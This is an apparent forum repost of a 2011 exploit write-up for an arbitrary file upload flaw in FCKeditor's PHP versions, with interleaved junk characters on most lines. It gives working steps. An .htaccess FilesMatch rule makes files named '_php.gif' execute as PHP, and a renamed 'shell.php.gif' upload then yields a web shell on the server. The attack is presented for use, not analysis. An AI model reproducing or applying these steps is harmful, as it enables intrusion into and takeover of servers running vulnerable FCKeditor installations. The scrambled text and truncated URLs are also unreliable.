FCKeditor所有php版本Upload上传漏洞
; P; W* P- E: p5 a作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
! {+ y# W! F- L& _6 G减小字体 增大字体
; E6 u2 U; N! s; o M[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability/ y! d6 `7 Y: s- N; K5 w m
[+] Date: 2011, U8 K1 c9 L. [7 e) L
[+] Author : sinesafe.cn U/ [; h4 X' t0 _% l
[+] Website : WwW.sinesafe.cn) T3 w6 F/ K) f* {# Q1 M( s; |
———————————————————: W. f' a" U* F! A
1.create a htaccess file:
U% b- i0 l. @ Z+ D* S; @$ Q% ecode:
5 R3 n" ~/ g: `2 q* Y2 k<FilesMatch “_php.gif”>
! n) M0 f5 G. A! z* {4 W: zSetHandler application/x-httpd-php
: u# n+ S4 Z( \1 D/ g6 y. s0 @9 w" W</FilesMatch>
, F- @4 D# F, ~3 i; ^' S: h: [$ ]& C
$ m, z; r+ V' x F M( y' t# p2 r3 E8 q2.Now upload this htaccess with FCKeditor.
5 W$ p8 f. d7 j# D# m1 F1 R
/ I u# {( [2 \) d7 s% O, M' V1 Shttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
" s3 S/ [8 w% ~! k1 j# u/ i( V+ |! P7 {4 g
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
; n3 ]" n% {/ i; u. Q
! k3 C$ C- e9 f, x2 _7 @6 o! D( E———————————————————————————————-
1 t& C: C& _, W* D3.Now upload shell.php.gif with FCKeditor.8 J7 P( e" x3 G% _. f
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.+ {0 T* b5 R) B2 h
5.http://www.sinesafe.cn/anything/shell_php.gif, S# s9 p: U" K7 F# `" B
6.Now shell is available from server. |
$ Q4 F5 }( f$ d
- l' d+ C% f* f! @
1 P% V: i( _0 ~ |
发表于 2013-10-27 17:25:21
收藏
支持
反对